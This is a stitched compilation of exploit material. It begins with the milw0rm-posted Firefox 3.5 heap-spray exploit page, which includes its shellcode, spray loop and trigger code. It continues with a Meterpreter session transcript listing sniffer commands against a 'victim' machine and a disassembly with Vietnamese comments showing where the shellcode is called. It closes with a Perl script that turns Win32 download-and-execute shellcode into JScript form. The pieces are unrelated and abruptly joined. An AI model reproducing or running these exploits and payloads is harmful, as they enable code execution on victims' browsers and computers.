<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">
<p>
<FONT>                             
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw  </FONT>
</p>
</div>
<script language=JavaScript>
 
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +   
                       "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +   
                       "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +   
                       "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +   
                       "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +   
                       "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +   
                       "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +   
                       "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +   
                       "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +   
                       "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +   
                       "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +   
                       "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +   
                       "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +   
                       "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +   
                       "%u652E%u6578%u9000");
/* Heap Spray code */            
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)  
{
    fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)  
{
    sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
 
function escapeData(data)
{
 var i;
 var c;
 var escData='';
 for(i=0;i<data.length;i++)
  {
   c=data.charAt(i);
   if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
   escData+=c;
  }
 return escData;
}
 
function DataTranslator(){
    searchArray = new Array();
    searchArray[0] = new Array();
    searchArray[0]["str"] = "blah";
    var newElement = document.getElementById("content")
    if (document.getElementsByTagName) {
        var i=0;
        pTags = newElement.getElementsByTagName("p")
        if (pTags.length > 0)  
        while (i<pTags.length)
        {
            oTags = pTags[i].getElementsByTagName("font")
            searchArray[i+1] = new Array()
            if (oTags[0])  
            {
                searchArray[i+1]["str"] = oTags[0].innerHTML;
            }
            i++
        }
    }
}
 
function GenerateHTML()
{
    var html = "";
    for (i=1;i<searchArray.length;i++)
    {
        html += escapeData(searchArray[i]["str"])
    }    
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>
<html><body></body></html>

# milw0rm.com [2009-07-13]

meterpreter > help

…….

Sniffer Commands

================

 

    Command             Description

    -------             -----------

    sniffer_dump        Retrieve captured packet data

    sniffer_interfaces  list all remote sniffable interfaces

    sniffer_start       Capture packets on a previously opened interface

    sniffer_stats       View statistics of an active capture

    sniffer_stop        Stop packet captures on the specified interface

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

meterpreter >

meterpreter > sysinfo

Computer: victim

OS      : Windows XP (Build 2600, Service Pack 2).

meterpreter >

0038695C            83E1 F8                    AND ECX,FFFFFFF8
0038695F            8B11                       MOV EDX,DWORD PTR DS:[ECX]
00386961            8B02                       MOV EAX,DWORD PTR DS:[EDX]  ; <-- EAX bị sửa đổi ở đây
00386963            83C3 FC                    ADD EBX,-4
00386966            53                         PUSH EBX
00386967            6A 00                      PUSH 0
00386969            51                         PUSH ECX
0038696A            8B48 20                    MOV ECX,DWORD PTR DS:[EAX+20] ; <-- Dùng kỹ thuật heap spray để chèn đoạn padding & shellcode vào vùng bộ nhớ eax + 20.
0038696D            57                         PUSH EDI
0038696E            FFD1                       CALL ECX         ; <-- Shellcode được gọi từ đây

#!/usr/bin/perl

use strict;

# Win32 Download & Execute Shellcode / Translating shellcode To JScript shellcode

# coded by elazer (elazarb [at] earthlink.net)


# linux Usage:
# bt shellcode # ./jscript.pl %uc933%ue983%ud9b8%ud9ee%u2474%u5bf4%u7381%u1713%uc161%u8392%ufceb%uf4e2%u0beb%udf2a%u98ff%u6d3e%u01e8%ufe4a%u4533%ud74a%uea2b%u97bd%u606f%u192e%u7958%ucd4a%u6037%udb2a%u559c%u934a%u50f9%u0b01%ue5bb%ue601%ua010%u9f0b%ua316%u662a%u352c%ubae5%u8462%ucd4a%u6033%uf42a%u6d9c%u198a%u7d48%u79c0%u4d14%u1b4a%u457b%uf3dd%u50d4%uf61a%u229c%u19f1%u6d57%ue24a%ucc0b%ud24a%u3f1f%u1ca9%u6f59%uc22d%ub7e8%uc1a7%u0971%ua0f2%u167f%ua0b2%u3548%u423e%uaa7f%u6e2c%u312c%u443e%ue848%uf424%u8c96%u90c9%u0b42%u6dc3%u09c7%u9b18%ucce2%u6d96%u32c1%uc192%u2244%ud192%u9e44%ufa11%uc9d7%ud1c0%u0971%u3cc9%u3271%u7348%u0982%u6b2d%u01bd%u6d96%u0bc1%uc3d1%u9e42%uf411%u057d%ufaa7%u0c74%uc2ab%u484e%u1b0d%u0bf0%u1b85%u50f5%u6101%uf4bd%u6f48%u23e9%u6cec%u4d55%ue84c%uca2f%u396a%u137f%u213f%u9e01%ubab4%ub7e8%uc59a%u3045%uc390%u607d%uc390%u3042%u423e%ucc7f%u9718%u32d9%u443e%u9e7d%ua53e%ub1e8%u75a9%ua76e%u6db8%u6562%u443e%u16e8%u6d3d%u09c7%u1831%u3e13%u6d92%u9ec1%u9211

# windows Usage:
# C:\Documents and Settings\elazer\Desktop>jscript.pl %uc933%ue983%ud9b8%ud9ee%u2474%u5bf4%u7381%u1713%uc161%u8392%ufceb%uf4e2%u0beb%udf2a%u98ff%u6d3e%u01e8%ufe4a%u4533%ud74a%uea2b%u97bd%u606f%u192e%u7958%ucd4a%u6037%udb2a%u559c%u934a%u50f9%u0b01%ue5bb%ue601%ua010%u9f0b%ua316%u662a%u352c%ubae5%u8462%ucd4a%u6033%uf42a%u6d9c%u198a%u7d48%u79c0%u4d14%u1b4a%u457b%uf3dd%u50d4%uf61a%u229c%u19f1%u6d57%ue24a%ucc0b%ud24a%u3f1f%u1ca9%u6f59%uc22d%ub7e8%uc1a7%u0971%ua0f2%u167f%ua0b2%u3548%u423e%uaa7f%u6e2c%u312c%u443e%ue848%uf424%u8c96%u90c9%u0b42%u6dc3%u09c7%u9b18%ucce2%u6d96%u32c1%uc192%u2244%ud192%u9e44%ufa11%uc9d7%ud1c0%u0971%u3cc9%u3271%u7348%u0982%u6b2d%u01bd%u6d96%u0bc1%uc3d1%u9e42%uf411%u057d%ufaa7%u0c74%uc2ab%u484e%u1b0d%u0bf0%u1b85%u50f5%u6101%uf4bd%u6f48%u23e9%u6cec%u4d55%ue84c%uca2f%u396a%u137f%u213f%u9e01%ubab4%ub7e8%uc59a%u3045%uc390%u607d%uc390%u3042%u423e%ucc7f%u9718%u32d9%u443e%u9e7d%ua53e%ub1e8%u75a9%ua76e%u6db8%u6562%u443e%u16e8%u6d3d%u09c7%u1831%u3e13%u6d92%u9ec1%u9211

# your shellcode here
my $shellcode =
"\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xdf".
"\xfa\xe2\x72\x83\xeb\xfc\xe2\xf4\x23\x90\x09\x3f\x37\x03\x1d\x8d".
"\x20\x9a\x69\x1e\xfb\xde\x69\x37\xe3\x71\x9e\x77\xa7\xfb\x0d\xf9".
"\x90\xe2\x69\x2d\xff\xfb\x09\x3b\x54\xce\x69\x73\x31\xcb\x22\xeb".
"\x73\x7e\x22\x06\xd8\x3b\x28\x7f\xde\x38\x09\x86\xe4\xae\xc6\x5a".
"\xaa\x1f\x69\x2d\xfb\xfb\x09\x14\x54\xf6\xa9\xf9\x80\xe6\xe3\x99".
"\xdc\xd6\x69\xfb\xb3\xde\xfe\x13\x1c\xcb\x39\x16\x54\xb9\xd2\xf9".
"\x9f\xf6\x69\x02\xc3\x57\x69\x32\xd7\xa4\x8a\xfc\x91\xf4\x0e\x22".
"\x20\x2c\x84\x21\xb9\x92\xd1\x40\xb7\x8d\x91\x40\x80\xae\x1d\xa2".
"\xb7\x31\x0f\x8e\xe4\xaa\x1d\xa4\x80\x73\x07\x14\x5e\x17\xea\x70".
"\x8a\x90\xe0\x8d\x0f\x92\x3b\x7b\x2a\x57\xb5\x8d\x09\xa9\xb1\x21".
"\x8c\xb9\xb1\x31\x8c\x05\x32\x1a\x1f\x52\xe0\x17\xb9\x92\xea\x3b".
"\xb9\xa9\x6b\x93\x4a\x92\x0e\x8b\x75\x9a\xb5\x8d\x09\x90\xf2\x23".
"\x8a\x05\x32\x14\xb5\x9e\x84\x1a\xbc\x97\x88\x22\x86\xd3\x2e\xfb".
"\x38\x90\xa6\xfb\x3d\xcb\x22\x81\x75\x6f\x6b\x8f\x21\xb8\xcf\x8c".
"\x9d\xd6\x6f\x08\xe7\x51\x49\xd9\xb7\x88\x1c\xc1\xc9\x05\x97\x5a".
"\x20\x2c\xb9\x25\x8d\xab\xb3\x23\xb5\xfb\xb3\x23\x8a\xab\x1d\xa2".
"\xb7\x57\x3b\x77\x11\xa9\x1d\xa4\xb5\x05\x1d\x45\x20\x2a\x8a\x95".
"\xa6\x3c\x9b\x8d\xaa\xfe\x1d\xa4\x20\x8d\x1e\x8d\x0f\x92\x12\xf8".
"\xdb\xa5\xb1\x8d\x09\x05\x32\x72";





my $jscript =convert_shellcode($shellcode);
buffer_gen($shellcode);
print $jscript;

sub generate_char()
{
 my $wdsize = shift;
 my @alphanumeric = ('a'..'z');
 my $wd = join '',
 map $alphanumeric[rand @alphanumeric], 0..$wdsize;
  return $wd;
}

sub convert_shellcode {
        my $data = shift;
        my $mode = shift() || 'LE';
        my $code = '';

        my $idx = 0;

        if (length($data) % 2 != 0) {
                $data .= substr($data, -1, 1);
        }

        while ($idx < length($data) - 1) {
                my $c1 = ord(substr($data, $idx, 1));
                my $c2 = ord(substr($data, $idx+1, 1));
                if ($mode eq 'LE') {
                        $code .= sprintf('%%u%.2x%.2x', $c2, $c1);
                } else {
                        $code .= sprintf('%%u%.2x%.2x', $c1, $c2);
                }
                $idx += 2;
        }

        return $code;
}

sub buffer_gen(){

}